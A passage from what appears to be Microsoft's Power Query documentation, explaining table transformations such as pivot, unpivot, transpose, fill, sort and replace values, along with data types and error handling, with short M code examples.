create a matrix of values, it's difficult to analyze the data in a scalable way.

Instead, you can transform the table into a table with unpivoted columns, as shown in
the following image. In the transformed table, it's easier to use the date as an attribute
to filter on.
The key in this transformation is that you have a set of dates in the table that should all
be part of a single column. The respective value for each date and country should be in
a different column, effectively creating an attribute-value pair.

Power Query will always create the attribute-value pair by using two columns:

Attribute: The name of the column headings that were unpivoted.


Value: The values that were underneath each of the unpivoted column headings.

There are multiple places in the user interface where you can find Unpivot columns. You
can right-click the columns that you want to unpivot, or you can select the command
from the Transform tab in the ribbon.
There are three ways that you can unpivot columns from a table:

Unpivot columns
Unpivot other columns
Unpivot only selected columns

Unpivot columns
For the scenario described above, you first need to select the columns you want to
unpivot. You can hold down Ctrl as you select as many columns as you need. For this
scenario, you want to select all the columns except the one named Country. After
selecting the columns, right-click any of the selected columns, and then select Unpivot
columns.
The result of that operation will yield the result shown in the following image.
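
This operation corresponds to the Table.UnpivotOtherColumns function, which lists the columns
to keep rather than the columns to unpivot. A minimal sketch, where Source stands for the
previous step:

Power Query M

let
    // Unpivot every column except Country. The old column headers go into Attribute,
    // and the values underneath them go into Value.
    #"Unpivoted Columns" = Table.UnpivotOtherColumns(Source, {"Country"}, "Attribute", "Value")
in
    #"Unpivoted Columns"

Because only the columns to keep are listed, any new column added to the source table is
unpivoted automatically on refresh, which is the behavior described in the special
considerations below.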

Special considerations
After creating your query from the steps above, imagine that your initial table gets
updated to look like the following screenshot.

Notice that you've added a new column for the date 9/1/2020 (September 1, 2020), and
two new rows for the countries UK and Mexico.

If you refresh your query, you'll notice that the operation will be done on the updated
column, but won't affect the column that wasn't originally selected (Country, in this
example). This means that any new column that's added to the source table will be
unpivoted as well.

The following image shows what your query will look like after the refresh with the new
updated source table.
Unpivot other columns
You can also select the columns that you don't want to unpivot and unpivot the rest of
the columns in the table. This operation is where Unpivot other columns comes into
play.
The result of that operation will yield exactly the same result as the one you got from
Unpivot columns.
7 Note

This transformation is crucial for queries that have an unknown number of columns.
The operation will unpivot all columns from your table except the ones that you've
selected. This is an ideal solution if the data source of your scenario got new date
columns in a refresh, because those will get picked up and unpivoted.

Special considerations
Similar to the Unpivot columns operation, if your query is refreshed and more data is
picked up from the data source, all the columns will be unpivoted except the ones that
were previously selected.

To illustrate this, say that you have a new table like the one in the following image.

You can select the Country column, and then select Unpivot other columns, which will
yield the following result.
Unpivot only selected columns
The purpose of this last option is to only unpivot specific columns from your table. This
is important for scenarios where you're dealing with an unknown number of columns
from your data source and you only want to unpivot the selected columns.

To perform this operation, select the columns to unpivot, which in this example is all the
columns except the Country column. Then right-click any of the columns you selected,
and then select Unpivot only selected columns.
Notice how this operation will yield the same output as the previous examples.

Special considerations
After doing a refresh, if our source table changes to have a new 9/1/2020 column and
new rows for UK and Mexico, the output of the query will be different from the previous
examples. Say that our source table, after a refresh, changes to the table in the following
image.
The output of our query will look like the following image.

It looks like this because the unpivot operation was applied only on the 6/1/2020,
7/1/2020, and 8/1/2020 columns, so the column with the header 9/1/2020 remains
unchanged.
Pivot columns
Article • 12/17/2022

In Power Query, you can create a table that contains an aggregate value for each unique
value in a column. Power Query groups each unique value, does an aggregate
calculation for each value, and pivots the column into a new table.

Imagine a table like the one in the following image.

This table contains values by country and date in a simple table. In this example, you
want to transform this table into the one where the date column is pivoted, as shown in
the following image.

7 Note
During the pivot columns operation, Power Query will sort the table based on the
values found on the first column—at the left side of the table—in ascending order.

To pivot a column

1. Select the column that you want to pivot.

2. On the Transform tab in the Any column group, select Pivot column.

3. In the Pivot column dialog box, in the Value column list, select Value.

By default, Power Query will try to do a sum as the aggregation, but you can select
the Advanced option to see other available aggregations.
The available options are:

Don't aggregate
Count (all)
Count (not blank)
Minimum
Maximum
Median
Sum
Average

Pivoting columns that can't be aggregated


You can pivot columns without aggregating when you're working with columns that
can't be aggregated, or aggregation isn't required for what you're trying to do. For
example, imagine a table like the following image, that has Country, Position, and
Product as fields.
Let's say you want to pivot the Position column in this table so you can have its values
as new columns. For the values of these new columns, you'll use the values from the
Product column. Select the Position column, and then select Pivot column to pivot that
column.

In the Pivot column dialog box, select the Product column as the value column. Select
the Advanced option button in the Pivot columns dialog box, and then select Don't
aggregate.
The result of this operation will yield the result shown in the following image.
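The same pivot can also be written directly in the M formula language with the Table.Pivot
function. The following is a minimal sketch, assuming the previous step of your query is
named Source and the columns are named as in this example; passing an aggregation function
such as List.Sum corresponds to the Sum option, while omitting it behaves like the Don't
aggregate option.

Power Query M

let
    // "Source" is assumed to be the previous step of your query.
    // Pivot the Position column; the Product column supplies the new values,
    // and no aggregation function is passed (the Don't aggregate option).
    Pivoted = Table.Pivot(Source, List.Distinct(Source[Position]), "Position", "Product")
in
    Pivoted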

Errors when using the Don't aggregate option


With the Don't aggregate option, the pivot operation grabs a single value and places it as
the value for the intersection of each column and row pair. For
example, let's say you have a table like the one in the following image.

You want to pivot that table by using the Date column, and you want to use the values
from the Value column. Because this pivot would make your table have just the Country
values on rows and the Dates as columns, you'd get an error for every single cell value
because there are multiple rows for every combination of Country and Date. The
outcome of the Pivot column operation will yield the results shown in the following
image.

Notice the error message "Expression.Error: There were too many elements in the
enumeration to complete the operation." This error occurs because the Don't aggregate
operation only expects a single value for the country and date combination.
Transpose a table
Article • 12/17/2022

The transpose table operation in Power Query rotates your table 90 degrees, turning
your rows into columns and your columns into rows.

Imagine a table like the one in the following image, with three rows and four columns.

The goal of this example is to transpose that table so you end up with four rows and
three columns.

On the Transform tab in the ribbon, select Transpose.

The result of that operation will look like the following image.
7 Note

Only the contents of the table will be transposed during the transpose operation;
the column headers of the initial table will be lost. The new columns will have the
name Column followed by a sequential number.

The headers you need in this example are in the first row of the table. To promote the
first row to headers, select the table icon in the upper-left corner of the data preview,
and then select Use first row as headers.
The result of that operation will give you the output that you're looking for.
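Both steps can be sketched in M with the Table.Transpose and Table.PromoteHeaders
functions. This is only a sketch and assumes the previous step of your query is named
Source.

Power Query M

let
    // Rotate the table 90 degrees: rows become columns and columns become rows.
    Transposed = Table.Transpose(Source),
    // Promote the first row of the transposed table to become the column headers.
    PromotedHeaders = Table.PromoteHeaders(Transposed, [PromoteAllScalars = true])
in
    PromotedHeaders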

7 Note

To learn more about the promote headers operation, also known as Use first row
as headers, go to Promote or demote column headers.
Reverse rows
Article • 12/17/2022

With Power Query, it's possible to reverse the order of rows in a table.

Imagine a table with two columns, ID and Country, as shown in the following image.

On the Transform tab, select Reverse rows.

The result of this operation will look as follows.
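This operation maps to a single M function, Table.ReverseRows. A minimal sketch, assuming
the previous step of your query is named Source:

Power Query M

// Reverse the order of the rows in the table.
Table.ReverseRows(Source)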


Data types in Power Query
Article • 12/17/2022

Data types in Power Query are used to classify values to have a more structured dataset.
Data types are defined at the field level—values inside a field are set to conform to the
data type of the field.

The data type of a column is displayed on the left side of the column heading with an
icon that symbolizes the data type.

7 Note

Power Query provides a set of contextual transformations and options based on
the data type of the column. For example, when you select a column with a data
type of Date, you get transformations and options that apply to that specific data
type. These transformations and options occur throughout the Power Query
interface, such as on the Transform and Add column tabs and the smart filter
options.

The most common data types used in Power Query are listed in the following table.
Although beyond the scope of this article, you can find the complete list of data types in
the Power Query M formula language Types article.

Text: A Unicode character data string. Can be strings, numbers, or dates represented in a
text format. Maximum string length is 268,435,456 Unicode characters (where each Unicode
character is two bytes) or 536,870,912 bytes.

True/False: A Boolean value of either True or False.

Decimal number: Represents a 64-bit (eight-byte) floating-point number. It's the most
common number type, and corresponds to numbers as you usually think of them. Although
designed to handle numbers with fractional values, it also handles whole numbers. The
Decimal Number type can handle negative values from –1.79E +308 through –2.23E –308, 0,
and positive values from 2.23E –308 through 1.79E +308. For example, numbers like 34,
34.01, and 34.000367063 are valid decimal numbers. The largest precision that can be
represented in a Decimal Number type is 15 digits long. The decimal separator can occur
anywhere in the number. The Decimal Number type corresponds to how Excel stores its
numbers. Note that a binary floating-point number can't represent all numbers within its
supported range with 100% accuracy. Thus, minor differences in precision might occur when
representing certain decimal numbers.

Fixed decimal number: Also known as the Currency type, this data type has a fixed location
for the decimal separator. The decimal separator always has four digits to its right and
allows for 19 digits of significance. The largest value it can represent is
922,337,203,685,477.5807 (positive or negative). Unlike Decimal Number, the Fixed Decimal
Number type is always precise and is thus useful in cases where the imprecision of
floating-point notation might introduce errors.

Whole number: Represents a 64-bit (eight-byte) integer value. Because it's an integer, it
has no digits to the right of the decimal place. It allows for 19 digits; positive or
negative whole numbers between –9,223,372,036,854,775,807 (–2^63+1) and
9,223,372,036,854,775,806 (2^63–2). It can represent the largest possible precision of the
various numeric data types. As with the Fixed Decimal Number type, the Whole Number type
can be useful in cases where you need to control rounding.

Percentage: Fundamentally the same as a Decimal Number type, but it has a mask to format
the values in the column as a percentage in the Power Query Editor window.

Date/Time: Represents both a date and time value. Underneath the covers, the Date/Time
value is stored as a Decimal Number type, so you can actually convert between the two. The
time portion of a date is stored as a fraction to whole multiples of 1/300 seconds (3.33
ms). Dates between the years 1900 and 9999 are supported.

Date: Represents just a date (no time portion). When converted into the model, a Date is
the same as a Date/Time value with zero for the fractional value.

Time: Represents just time (no date portion). When converted into the model, a Time value
is the same as a Date/Time value with no digits to the left of the decimal place.

Date/Time/Timezone: Represents a UTC Date/Time with a time-zone offset. It's converted
into Date/Time when loaded into the model.

Duration: Represents a length of time, which is converted into a Decimal Number type when
loaded into the model. As a Decimal Number type, it can be added or subtracted from a
Date/Time field with correct results. Because it's a Decimal Number type, you can easily
use it in visualizations that show magnitude.

Binary: The Binary data type can be used to represent any other data with a binary format.

Any: The Any data type is the status given to a column that doesn't have an explicit data
type definition. Any is the data type that classifies all values. We recommend that you
always explicitly define the column data types for your queries from unstructured sources,
and avoid having any columns with the Any data type as the output of your query.

Data type detection


Data type detection occurs automatically when connecting to:

Structured data sources, such as databases: Power Query reads the table schema
from the data source and automatically displays the data by using the correct data
type for each column.

Unstructured sources, such as Excel, CSV, and text files: Power Query automatically
detects data types by inspecting the values in the table. By default, automatic data
type detection is enabled in Power Query for unstructured sources.

You can also use the Detect data type command in the Any column group on the
Transform tab to automatically detect the data types of the columns in your table.
How to define a column data type
You can define or change the data type of a column in any of four places:

On the Home tab, in the Transform group, on the Data type drop-down menu.

On the Transform tab, in the Any column group, on the Data type drop-down
menu.

By selecting the icon on the left side of the column heading.


On the column shortcut menu, under Change Type.
Automatic detection of column data type and headers
This setting is specifically for unstructured sources. It helps you by automatically
inspecting and detecting column types and headers based on the first 200 rows of your
table. When this setting is enabled, Power Query automatically adds two steps to your
query:

Promote column headers: Promotes the first row of the table to be the column
header.
Changed type: Converts the values from the Any data type to a data type based
on the inspection of the values from each column.

By default, this setting is enabled. To disable or enable this setting, follow the steps that
apply to your Power Query experience.

To configure automatic data type detection in Power Query Online


On the Home tab, select Options, and then select Project options. In the Project
options window, select the Automatically detect column types and headers for
unstructured sources check box.

To configure automatic data type detection in Power Query for Desktop

You can define this behavior both at the global and per-file level in the Options window
(in the Power Query Editor, on the File tab, select Options and settings > Options).

Global: On the left pane under Global, select Data load. On the right pane under
Type detection, you can select any of three type detection configurations that will
be applied to every new file created in your application:
Always detect column types and headers for unstructured sources
Detect column types and headers for unstructured sources according to each
file's setting
Never detect column types and headers for unstructured sources
Current file: On the left pane under Current file, select Data load. On the right
pane under Type detection, select whether you want to enable or disable type
detection for the current file.
Document or project locale
Power Query handles two distinct components that manage the way that things look
and are interpreted:

Localization: the component that tells Power Query in what language it should be
displayed.
Globalization: the component that handles the formatting of the values, in addition
to the interpretation of text values.

Locale is a single value that holds both the localization and globalization components.
Locale is used to interpret text values and convert them into other data types. For
example, the locale English (United States) means that the localization is in United
States English and the globalization, or format of the value, is based on the standards
used in the United States.

When Power Query defines a column data type or converts from one data type to
another, it has to interpret the values to be converted before it can transform them to a
different data type.

In Power Query Online, this interpretation is defined in Project options, under
Locale.

In Power Query for Desktop, Power Query automatically recognizes your operating
system regional format and uses that to interpret the values for data type
conversion. To override this locale configuration, open the query Options window,
and in the left pane under Current file, select Regional settings. From here, you
can change the locale to the setting you want.
This locale setting is important for interpreting text values into a specific data type. For
example, imagine that you have your locale set as English (United States), but a column
in one of your CSV files has dates formatted in the United Kingdom format of
day/month/year.

When you try setting the data type of the Date column to be Date, you get error values.
These errors occur because the locale being used is trying to interpret the date in the
English (United States) format, which is month/day/year. Because there's no month 22 in
the calendar, it causes an error.

Instead of trying to just select the Date data type, you can right-click the column
heading, select Change type, and then select Using locale.
In the Change column type with locale dialog box, you select the data type that you
want to set, but you also select which locale to use, which in this case needs to be
English (United Kingdom).
Using this locale, Power Query will be able to interpret values correctly and convert
those values to the right data type.
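When you change a type by using a locale, the culture is passed as an extra argument to
Table.TransformColumnTypes. A minimal sketch, assuming the previous step of your query is
named Source and the column is named Date:

Power Query M

// Convert the Date column to the Date type, interpreting the text values
// with the English (United Kingdom) culture ("en-GB").
Table.TransformColumnTypes(Source, {{"Date", type date}}, "en-GB")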

To verify final date values

The formatting of the values is driven by the globalization value. If you have any doubts
about the value displayed by Power Query, you can verify the conversion of date values
by adding new columns for the day, month, and year from the value. To do this, select
the Date column and go to the Add column tab on the ribbon. In the Date and time
column group, you'll see the options for a date column.
From here, you can extract parts of the date value, such as the year number, the month
number, the day number, or even more columns extracted from the Date column.

By using these columns, you can verify that your date value has been converted
correctly.

Data type conversion matrix


The following matrix is designed to give you a quick look at the feasibility of data type
conversion of a value from one data type to another.
7 Note

Conversion in this matrix starts with the original data type in the Data types
column. Each result of a conversion to the new type is shown in the original data
type’s row.

The matrix covers conversions between the following data types: Decimal number, Currency,
Whole number, Percentage, Date/Time, Date, Time, Date/Time/Timezone, Duration, Text, and
True/False.

Each cell in the matrix uses an icon to indicate whether the conversion is possible, not
possible, possible but adds values to the original value, or possible but truncates the
original value.


Dealing with errors in Power Query
Article • 12/17/2022

In Power Query, you can encounter two types of errors:

Step-level errors
Cell-level errors

This article provides suggestions for how to fix the most common errors you might find
at each level, and describes the error reason, error message, and error detail for each.

Step-level error
A step-level error prevents the query from loading and displays the error components in
a yellow pane.

Error reason: The first section before the colon. In the example above, the error
reason is Expression.Error.
Error message: The section directly after the reason. In the example above, the
error message is The column 'Column' of the table wasn't found.
Error detail: The section directly after the Details: string. In the example above, the
error detail is Column.

Common step-level errors


In all cases, we recommend that you take a close look at the error reason, error
message, and error detail to understand what's causing the error. You can select the Go
to error button, if available, to view the first step where the error occurred.

Can't find the source - DataSource.Error


This error commonly occurs when the data source is inaccessible by the user, the user
doesn't have the correct credentials to access the data source, or the source has been
moved to a different place.

Example: You have a query from a text file that was located in drive D and created by
user A. User A shares the query with user B, who doesn't have access to drive D. When
this person tries to execute the query, they get a DataSource.Error because there's no
drive D in their environment.

Possible solutions: You can change the file path of the text file to a path that both users
have access to. As user B, you can change the file path to be a local copy of the same
text file. If the Edit settings button is available in the error pane, you can select it and
change the file path.

The column of the table wasn't found


This error is commonly triggered when a step makes a direct reference to a column
name that doesn't exist in the query.

Example: You have a query from a text file where one of the column names was Column.
In your query, you have a step that renames that column to Date. But there was a
change in the original text file, and it no longer has a column heading with the name
Column because it was manually changed to Date. Power Query is unable to find a
column heading named Column, so it can't rename any columns. It displays the error
shown in the following image.

Possible solutions: There are multiple solutions for this case, but they all depend on
what you'd like to do. For this example, because the correct Date column header already
comes from your text file, you can just remove the step that renames the column. This
will allow your query to run without this error.

Other common step-level errors


When combining or merging data between multiple data sources, you might get a
Formula.Firewall error such as the one shown in the following image.

This error can be caused by a number of reasons, such as the data privacy levels
between data sources or the way that these data sources are being combined or
merged. For more information about how to diagnose this issue, go to Data privacy
firewall.

Cell-level error
A cell-level error won't prevent the query from loading, but displays error values as Error
in the cell. Selecting the white space in the cell displays the error pane underneath the
data preview.

7 Note

The data profiling tools can help you more easily identify cell-level errors with the
column quality feature. More information: Data profiling tools

Handling errors at the cell level


When encountering any cell-level errors, Power Query provides a set of functions to
handle them either by removing, replacing, or keeping the errors.
For the next sections, the provided examples will be using the same sample query as the
start point. In this query, you have a Sales column that has one cell with an error caused
by a conversion error. The value inside that cell was NA, but when you transformed that
column to a whole number Power Query couldn't convert NA to a number, so it displays
the following error.

Remove errors
To remove rows with errors in Power Query, first select the column that contains errors.
On the Home tab, in the Reduce rows group, select Remove rows. From the drop-down
menu, select Remove errors.

The result of that operation will give you the table that you're looking for.
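The same result can be expressed in M with Table.RemoveRowsWithErrors. This sketch assumes
the previous step of your query is named Source:

Power Query M

// Remove any row that has an error value in the Sales column.
Table.RemoveRowsWithErrors(Source, {"Sales"})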
Replace errors
If instead of removing rows with errors, you want to replace the errors with a fixed value,
you can do so as well. To replace rows that have errors, first select the column that
contains errors. On the Transform tab, in the Any column group, select Replace values.
From the drop-down menu, select Replace errors.

In the Replace errors dialog box, enter the value 10 because you want to replace all
errors with the value 10.

The result of that operation will give you the table that you're looking for.
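In M, this operation corresponds to Table.ReplaceErrorValues. A minimal sketch, again
assuming the previous step of your query is named Source:

Power Query M

// Replace every error value in the Sales column with the number 10.
Table.ReplaceErrorValues(Source, {{"Sales", 10}})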

Keep errors
Power Query can serve as a good auditing tool to identify any rows with errors even if
you don't fix the errors. This is where Keep errors can be helpful. To keep rows that have
errors, first select the column that contains errors. On the Home tab, in the Reduce rows
group, select Keep rows. From the drop-down menu, select Keep errors.

The result of that operation will give you the table that you're looking for.
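A comparable sketch in M uses Table.SelectRowsWithErrors, assuming the previous step of
your query is named Source:

Power Query M

// Keep only the rows that have an error value in the Sales column.
Table.SelectRowsWithErrors(Source, {"Sales"})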

Common cell-level errors


As with any step-level error, we recommend that you take a close look at the error
reasons, error messages, and error details provided at the cell level to understand what's
causing the errors. The following sections discuss some of the most frequent cell-level
errors in Power Query.

Data type conversion errors

This error is commonly triggered when changing the data type of a column in a table. Some
values found in the column could not be converted to the desired data type.

Example: You have a query that includes a column named Sales. One cell in that column
has NA as a cell value, while the rest have whole numbers as values. You decide to
convert the data type of the column from text to whole number, but the cell with the
NA value causes an error.
Possible solutions: After identifying the row with the error, you can either modify the
data source to reflect the correct value rather than NA, or you can apply a Replace error
operation to provide a value for any NA values that cause an error.

Operation errors

When trying to apply an operation that isn't supported, such as multiplying a text value
by a numeric value, an error occurs.

Example: You want to create a custom column for your query by creating a text string
that contains the phrase "Total Sales: " concatenated with the value from the Sales
column. An error occurs because the concatenation operation only supports text
columns and not numeric ones.
Possible solutions: Before creating this custom column, change the data type of the
Sales column to be text.

Nested values shown as errors

When working with data that contains nested structured values (such as tables, lists, or
records), you may sometimes encounter the following error:
Expression.Error: We cannot return a value of type {value} in this context

Details: In the past we would have returned a text value of {value}, but we
now return this error. Please see https://go.microsoft.com/fwlink/?
linkid=2099726 for more information.

These errors usually occur for two reasons:

When the Data Privacy Firewall buffers a data source, nested non-scalar values are
automatically converted to errors.
When a column defined with the Any data type contains non-scalar values, such
values will be reported as errors during load (such as in a Workbook in Excel or the
data model in Power BI Desktop).

Possible solutions:

Remove the column that contains the error, or set a data type other than Any for such a
column.
Change the privacy levels of the data sources involved to one that allows them to
be combined without being buffered.
Flatten the tables before doing a merge to eliminate columns that contain nested
structured values (such as table, record, or list).
Working with duplicate values
Article • 12/17/2022

You can work with duplicate sets of values through transformations that can remove
duplicates from your data or filter your data to show duplicates only, so you can focus
on them.

2 Warning

Power Query is case-sensitive. When working with duplicate values, Power Query
considers the case of the text, which might lead to undesired results. As a
workaround, users can apply an uppercase or lowercase transform prior to
removing duplicates.

For this article, the examples use the following table with id, Category, and Total
columns.

Remove duplicates
One of the operations that you can perform is to remove duplicate values from your
table.

1. Select the columns that contain duplicate values.

2. Go to the Home tab.

3. In the Reduce rows group, select Remove rows.

4. From the drop-down menu, select Remove duplicates.


2 Warning

There's no guarantee that the first instance in a set of duplicates will be chosen
when duplicates are removed. To learn more about how to preserve sorting, go to
Preserve sort.

Remove duplicates from multiple columns


In this example, you want to identify and remove the duplicates by using all of the
columns from your table.

You have four rows that are duplicates. Your goal is to remove those duplicate rows so
there are only unique rows in your table. Select all columns from your table, and then
select Remove duplicates.

The result of that operation will give you the table that you're looking for.
7 Note

This operation can also be performed with a subset of columns.

Remove duplicates from a single column


In this example, you want to identify and remove the duplicates by using only the
Category column from your table.

You want to remove those duplicates and only keep unique values. To remove duplicates
from the Category column, select it, and then select Remove duplicates.

The result of that operation will give you the table that you're looking for.
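In M, removing duplicates maps to the Table.Distinct function. The following sketch
assumes the previous step of your query is named Source; pass a list of columns to
deduplicate on a subset, or omit the second argument to use all columns:

Power Query M

// Keep only the first occurrence of each value in the Category column.
Table.Distinct(Source, {"Category"})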
Keep duplicates
Another operation you can perform with duplicates is to keep only the duplicates found
in your table.

1. Select the columns that contain duplicate values.

2. Go to the Home tab.

3. In the Reduce rows group, select Keep rows.

4. From the drop-down menu, select Keep duplicates.

Keep duplicates from multiple columns


In this example, you want to identify and keep the duplicates by using all of the columns
from your table.

You have four rows that are duplicates. Your goal in this example is to keep only the
rows that are duplicated in your table. Select all the columns in your table, and then
select Keep duplicates.

The result of that operation will give you the table that you're looking for.

Keep duplicates from a single column


In this example, you want to identify and keep the duplicates by using only the id
column from your table.

In this example, you have multiple duplicates and you want to keep only those
duplicates from your table. To keep duplicates from the id column, select the id column,
and then select Keep duplicates.

The result of that operation will give you the table that you're looking for.

See also
Data profiling tools
Fill values in a column
Article • 12/17/2022

You can use fill up and fill down to replace null values with the last non-empty value in a
column. For example, imagine the following table where you'd like to fill down in the
Date column and fill up in the Comments column.

The outcome that you'd expect is shown in the following image.

Fill down
The fill down operation takes a column and traverses through the values in it to fill any
null values in the next rows until it finds a new value. This process continues on a row-
by-row basis until there are no more values in that column.
In the following example, you want to fill down on the Date column. To do that, you can
right-click to select the Date column, and then select Fill > Down.

The result of that operation will look like the following image.
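The equivalent M expression uses Table.FillDown. A minimal sketch, assuming the previous
step of your query is named Source:

Power Query M

// Propagate the last non-null value in the Date column into the null rows below it.
Table.FillDown(Source, {"Date"})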
Fill up
In the same way as the fill down operation, fill up works on a column. But by contrast, fill
up finds the last value of the column and fills any null values in the previous rows until it
finds a new value. Then the same process occurs for that value. This process continues
until there are no more values in that column.

In the following example, you want to fill the Comments column from the bottom up.
You'll notice that your Comments column doesn't have null values. Instead it has what
appears to be empty cells. Before you can do the fill up operation, you need to
transform those empty cells into null values: select the column, go to the Transform tab,
and then select Replace values.

In the Replace values dialog box, leave Value to find blank. For Replace with, enter null.

More information: Replace values

After all empty cells are replaced with null, select the Comments column, go to the
Transform tab, and then select Fill > Up.
The result of that operation will look like the following image.
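Both steps can be sketched together in M, assuming the previous step of your query is
named Source:

Power Query M

let
    // Turn the empty text cells in the Comments column into nulls.
    ReplacedEmptyWithNull = Table.ReplaceValue(Source, "", null, Replacer.ReplaceValue, {"Comments"}),
    // Fill each null cell with the next non-null value found below it.
    FilledUp = Table.FillUp(ReplacedEmptyWithNull, {"Comments"})
in
    FilledUp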

Cleaning up your table


1. Filter the Units column to show only rows that aren't equal to null.
2. Rename the Comments column as Sales Person.

3. Remove the Sales Person: values from the Sales Person column so you only get
the names of the salespeople.

Now you should have exactly the table you were looking for.

See also
Replace values
Sort columns
Article • 08/09/2023

You can sort a table in Power Query by one column or multiple columns. For example,
take the following table with the columns named Competition, Competitor, and
Position.

For this example, the goal is to sort this table by the Competition and Position fields in
ascending order.

Sort ascending sorts alphabetical rows in a column from A to Z, then a to z. Sort


descending sorts alphabetical rows in a column from z to a, then Z to A. For example,
examine the following unsorted column:
When sorted using sort ascending, an alphabetical column is sorted in the following
way:

When sorted using sort descending, an alphabetical column is sorted in the following
way:
To sort a table by using columns
To sort the table, first select the column to be sorted. After the column has been
selected, you can select the sort operation from one of two places:

On the Home tab, in the Sort group, there are icons to sort your column in either
ascending or descending order.

From the column heading drop-down menu. Next to the name of the column
there's a drop-down menu indicator . When you select the icon, you'll see the
option to sort the column.
In this example, first you need to sort the Competition column. You'll perform the
operation by using the buttons in the Sort group on the Home tab. This action creates a
new step in the Applied steps section named Sorted rows.

A visual indicator, displayed as an arrow pointing up, gets added to the Competition
drop-down menu icon to show that the column is being sorted in ascending order.

Now you'll sort the Position field in ascending order as well, but this time you'll use the
Position column heading drop-down menu.

Notice that this action doesn't create a new Sorted rows step, but modifies it to perform
both sort operations in one step. When you sort multiple columns, the order that the
columns are sorted in is based on the order the columns were selected in. A visual
indicator, displayed as a number to the left of the drop-down menu indicator, shows the
place each column occupies in the sort order.
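The resulting Sorted rows step can also be written directly in M with Table.Sort. A
minimal sketch, assuming the previous step of your query is named Source:

Power Query M

// Sort by Competition first and then by Position, both in ascending order.
Table.Sort(Source, {{"Competition", Order.Ascending}, {"Position", Order.Ascending}})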

To clear a sort operation from a column


Do one of the following actions:

Select the down arrow next to the column heading, and then select Clear sort.
In Applied steps on the Query Settings pane, delete the Sorted rows step.
Rename columns
Article • 12/17/2022

In Power Query, you can rename columns to format the dataset in a clear and concise
way.

As an example, let's start with a dataset that has two columns.

Column 1 Column 2

Panama Panama

USA New York

Canada Toronto

The column headers are Column 1 and Column 2, but you want to change those names
to more friendly names for your columns.

Column 1 becomes Country


Column 2 becomes City

The end result that you want in Power Query looks like the following table.

How to rename a column


There are three ways to rename a column in Power Query.

Double-click the column header: The double-click action immediately lets you
rename the column.
Right-click the column of your choice: A contextual menu is displayed and you
can select the Rename option to rename the selected column.

Rename option in the Transform tab: In the Transform tab, under the Any column
group, select the Rename option.
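Whichever method you use, the rename is recorded as a Table.RenameColumns step in M. A
minimal sketch for the Country and City example above, assuming the previous step of your
query is named Source:

Power Query M

// Rename Column 1 to Country and Column 2 to City.
Table.RenameColumns(Source, {{"Column 1", "Country"}, {"Column 2", "City"}})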

Avoiding duplicate column names


Power Query requires table column names to be unique across all columns. This means
that if you try to rename a column to a column name that already exists in the table, an
error with the message Column Name Conflict appears. You'll have to rename the
column to something else.

For example, for the first sample table provided in this article, imagine that you try to
rename both Column 1 and Column 2 to "Geography". An error message pops up that
prevents you from renaming the second column to "Geography".

Column name disambiguation


With many actions performed in Power Query that might result in a Column Name
Conflict, Power Query tries to disambiguate by renaming all duplicate instances of the
same column name. The way that Power Query renames these columns is by adding a
suffix to the original column name that has a separator (commonly a dot or an
underscore), and then a number that represents the instance of the duplicated column
name in the order that it was found by Power Query. This renaming can often happen
with actions such as, but not limited to:

Promoting your column headers from your first row: For example, if you tried
promoting the first row of the sample table in this article, Power Query renames
the columns to Panama and Panama_1.

7 Note
To learn more about how to promote headers from your first row, go
toPromote or demote column headers.

Expanding a column with a field name that also exists in the current table: This
can happen, for example, when you perform a merge operation and the column
with the merged table has field names that also exist in the table. When you try to
expand the fields from that column, Power Query automatically tries to
disambiguate to prevent Column Name Conflict errors.
Move columns
Article • 02/17/2023

A common process when preparing data is to move columns in the dataset.

To accomplish this move, you can either select the Move option or drag and drop the
column.

Move option
The following example shows the different ways of moving columns. This example
focuses on moving the Contact Name column.

You move the column using the Move option. This option is located in the Any column
group under the Transform tab. In the Move option, the available choices are:

Before
After
To beginning
To end

You can also find this option when you right-click a column.
If you want to move one column to the left, then select Before.

The new location of the column is now one column to the left of its original location.
If you want to move one column to the right, then select After.

The new location of the column is now one column to the right of its original location.

If you want to move the column to the far left of the dataset, then select To
beginning.
The new location of the column is now on the far left side of the table.

If you want to move the column to the far right of the dataset, then select To
end.

The new location of the column is now on the far right side of the table.
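Moves like these are recorded in M as a Table.ReorderColumns step, which lists the columns
in their new order. A minimal sketch, assuming the previous step of your query is named
Source and using hypothetical names for the other columns in the table:

Power Query M

// Place Contact Name at the far right; the other column names here are hypothetical.
Table.ReorderColumns(Source, {"Company", "Address", "City", "Contact Name"})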

Drag and drop


Another way to move a column through the dataset is to drag and drop the column.
Move the column to the place where you would like to place it.
Go to column feature
If you want to find a specific column, then go to the View tab in the ribbon and select
Go to column.

From there, you can specifically select the column you would like to view, which is
especially useful if there are many columns.
Replace values and errors
Article • 12/17/2022

With Power Query, you can replace one value with another value wherever that value is
found in a column. The Replace values command can be found:

On the cell shortcut menu. Right-click the cell to replace the selected value in the
column with another value.

On the column shortcut menu.

On the Home tab, in the Transform group.


On the Transform tab, in the Any column group.

The replace values operation has two modes:

Replace entire cell contents: This is the default behavior for non-text columns,
where Power Query searches for and replaces the full contents of a cell. You can
enable this mode for text columns by selecting Advanced options, and then
selecting the Match entire cell contents check box.
Replace instances of a text string: This is the default behavior for text columns,
where Power Query will search for a specific text string in all rows of a column and
replace as many instances of the text string that it finds.

Advanced options are only available in columns of the Text data type. Within that set of
options is the Replace using special characters option.
Replace entire cell contents
Imagine a table like the following, where you have columns for Account ID, Category
Name, and Sales Goal.

The value of -1 in the Sales Goal column is an error in the source and needs to be
replaced with the standard sales goal defined by the business for these instances, which
is 250,000. To do that, right-click the -1 value, and then select Replace values. This action
will bring up the Replace values dialog box with Value to find set to -1. Now all you
need to do is enter 250000 in the Replace with box.

The outcome of that operation will give you the result that you're looking for.
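This replacement corresponds to the Table.ReplaceValue function with the
Replacer.ReplaceValue replacer. A minimal sketch, assuming the previous step of your query
is named Source:

Power Query M

// Replace every -1 found in the Sales Goal column with 250000.
Table.ReplaceValue(Source, -1, 250000, Replacer.ReplaceValue, {"Sales Goal"})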

Replace instances of a text string


Continuing with the previous table, let's say you want to remove the text string
"Category Name: " from the Category Name column. To do that, go to the Transform
group on the Home tab, and select Replace values. In the Replace values dialog box,
enter the text string Category Name: (followed by a space) in the Value to find box,
leave the Replace with box empty, and then select OK.
The result of that operation gives you the table in the following image.
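When replacing instances of a text string, the step uses the Replacer.ReplaceText replacer
instead. A minimal sketch, assuming the previous step of your query is named Source:

Power Query M

// Remove the "Category Name: " prefix by replacing it with an empty string.
Table.ReplaceValue(Source, "Category Name: ", "", Replacer.ReplaceText, {"Category Name"})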
Parse text as JSON or XML
Article • 12/17/2022

In Power Query, you can parse the contents of a column with text strings by identifying
